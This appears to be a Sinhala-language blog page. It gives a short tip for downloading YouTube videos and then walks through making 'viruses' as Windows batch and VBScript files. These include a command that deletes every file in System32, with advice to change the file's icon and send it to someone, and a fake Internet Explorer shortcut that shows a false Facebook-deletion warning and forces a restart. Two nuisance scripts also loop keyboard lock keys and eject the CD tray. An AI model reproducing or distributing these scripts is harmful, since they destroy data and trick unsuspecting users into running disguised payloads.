Slide bar

女 の こころ あき の 空 කරමුද හොරා පොලිස් සෙල්ලම...

You Tube videos බාන්න ලේසි ක්‍රමයක්!


















අපි youtube එකෙන් video ඩවුන්ලෝඩ් කරනකොට නොයෙක් ක්‍රම හාවිතා කරනවා... Youtube Downloader , ATUBE CATCHER,IDM... වගේ ඒවා යොදාගන්න පුළුවන් ...තවත් ඒවා තියෙනවා....ඉතින් මේ කියන්න යන්නේ ඒවා මොකුත්ම නැතිව Youtube video ඩවුන්ලෝඩ් කරන විදිහක් ගැන...මම හිතනවා video බාගන්න අයට මේ ක්‍රමය ගොඩක් වැදගත් වෙයි ...
හරිම මුලින්ම http://www.youtube.com ඩවුන්ලෝඩ් කලයුතු video එක මත ඩබල් ක්ලික් කර එය ඕපන් කරගන්න. එවිට ඇඩ්‍රස් බාර් එකේ තියෙන ලින්ක් එක මෙන්න මේ විදිහටයි,






දැන් youtube.com කියන තැනට ඉදිරියෙන් SS එකතු කරලා Enter KEY එක ඔබන්න.
මෙන්න මේ වගේ,





එවිට පහත රූපයේ පරිදි video එක ඩවුන්ලෝඩ් කිරීමට අවශ්‍ය ලින්ක් අපට ලබාදෙනවා...
එතනින් අපට ගැලපෙන එක තෝරාගන්න පුළුවන්..මේවගේ,













ඕන්න මම ගියා

මාරක virus හදමුද ? මෙන්න එහෙනම්..


System32 Folder එකේ ඔක්කොම Files Delete වෙන Virus එකක් හදමු. 

හරි වැඩෙට බහිමු..
මුලින්ම කියන්න ඔනේ මේක ඔයාගෙ machine එකේ නම් open කරන්න එපා...

වැඩේ නම් හරිම ලෙසියි පොඩි වැඩක්...මුලින්ම පහල තියන code එක copy කරල notepad එකකට save කරන්න.

CODE: del c:\windows\system32\*.* /q
ඉතින් ඊට පස්සෙ ඔනෙ නමක් ගහල අගට .bat කියල කරන්න..වැඩේ හරි.අහ් මෙකෙන් මොනවද වෙන්නෙ කියල කිව්වෙ නෑනෙ..මේකෙන් වෙන්නෙ system32 folder එකේ ඔක්කොම files delete වෙන එක...ඔයාලට ඔනෙ නම් ඔකෙ icon එක change කරල කාටහරි යවන්න..අයෙත් කියන්නම් ඕක ඔයාගෙ pc එකේ නම් කරන්න එපා....


යාළුවො බය කරන්න Virus එකක් හදමු

1) මුලින්ම notepad එක Open කරගන්න.
2) ඊළඟට මම මේ යටින් කියල තියෙන ටික notepad eke type කරන්න.


Quote
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."


3) ඊට පස්සේ එක Internet Explorer.bat කියල save කරගන්න.

4) save කරගත්තු bat file eka right click karala create shortcut kiyana eka click karanna.

5) Right Click කරලා Properties යන්න.

6) Icon එක මේ විදියට Change කරන්න.

7) Internet Explorer Icon එක ම තෝරාගන්න.

8) දන ඉතින් ඔක්කොම හරි, කරන්න තියෙන්නේ ඇත්ත Internet Explorer shortcut eka delete කරලා මේ තියාගන්න එක. මේක උඩ ක්ලික් කරාම මේ වගේ දෙයක් ඔයාලටත් පෙන්නයි




















දන්නේ නැති කෙනෙක් ට මේක පෙන්නුවොත් එහෙම රත් වෙයි, අයි ඉතින් මේකේ කියනවනේ තමන්ගේ Facebook account ekath delete කරනවා කියල.


KeyBord එක පිස්සු නටවන Virus එකක් හදමු 

ඉස්සෙල්ල වගේමයි..

1. Notepad එකක් open කරගන්න.
2. පහලතියෙන code එක copy කරල Notepad එකට paste කරන්න:


Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop 


3. දැන් ඔය Notepad එක save as ගිහින් disco2.vbs කියල save කරන්න.
(කැමතින මකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්න ඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..

දැන් keyboard එක පිස්සුනටන හැටි බලන්නවෙන notepad එකක් අරන් මොනවහරි type කරල බලන්න..

ඕක නවත්තන්නෙත් ඉස්සෙල්ල විදිහටමයි..
TASK MANAGER එක open කරල(ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.


CD Rom එක auto open වෙන simple virus එකක්හදමු.

1. Notepad එකක් open කරගන්න.
2. පහල තියෙන code එක copy කරල Notepad එකට paste කරන්න:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >=1 then
do
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
For i=0 to colCDROMs.COunt -1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
End If


3. දැන් ඔය Notepad එක save as ගිහින් disco.vbs කියල save කරන්න.
(කැමතිනමකින් save කරගන්ඩ පුලුවන්. ඒත් .vbs අන්තිමට එන්නඕනෙ..)

4. දැන් හැදෙන .vbs file එක double click කරල බලන්න..
කොහොමඩ වැඩ..

* CD Rom එක Auto open වෙනඑක නවත්තන්න TASK MANAGER එක open කරල (ctrl+alt+del), ඒකෙ "Processes" tab එක click කරන්න.
ඒකෙ තියෙන list එකෙන් "WSCRIPT.EXE" කියල තියෙන file එක හොයල select කරල Delete කරන්න.

Blogger Widgets